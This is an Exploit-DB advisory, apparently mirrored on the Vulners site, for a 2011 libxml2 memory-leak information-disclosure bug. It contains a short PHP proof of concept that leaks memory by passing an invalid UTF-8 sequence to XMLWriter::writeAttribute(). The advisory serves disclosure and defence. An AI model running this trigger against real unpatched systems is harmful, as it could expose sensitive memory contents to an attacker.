Lucene search
K

libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure

🗓️ 24 Jan 2011 00:00:00Reported by Kees CookType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

'libxml2 2.6.x - XMLWriter::writeAttribute() Memory Leak Information Disclosure vulnerability

Code
source: https://www.securityfocus.com/bid/45973/info

The 'libxml2' library is prone to a local information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

<?php 
# Copyright 2010, Canonical, Ltd. 
# Author: Kees Cook <[email protected]> 
# License: GPLv3 
# 
# Proof-of-concept memory content leak 

$xw = new XMLWriter(); 
$xw->openURI('php://output'); 

$xw->startElement('input'); 
$xw->writeAttribute('value', "\xe0\x81"); 
$xw->endElement(); 

?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2011 00:00Current
7.4High risk
Vulners AI Score7.4
26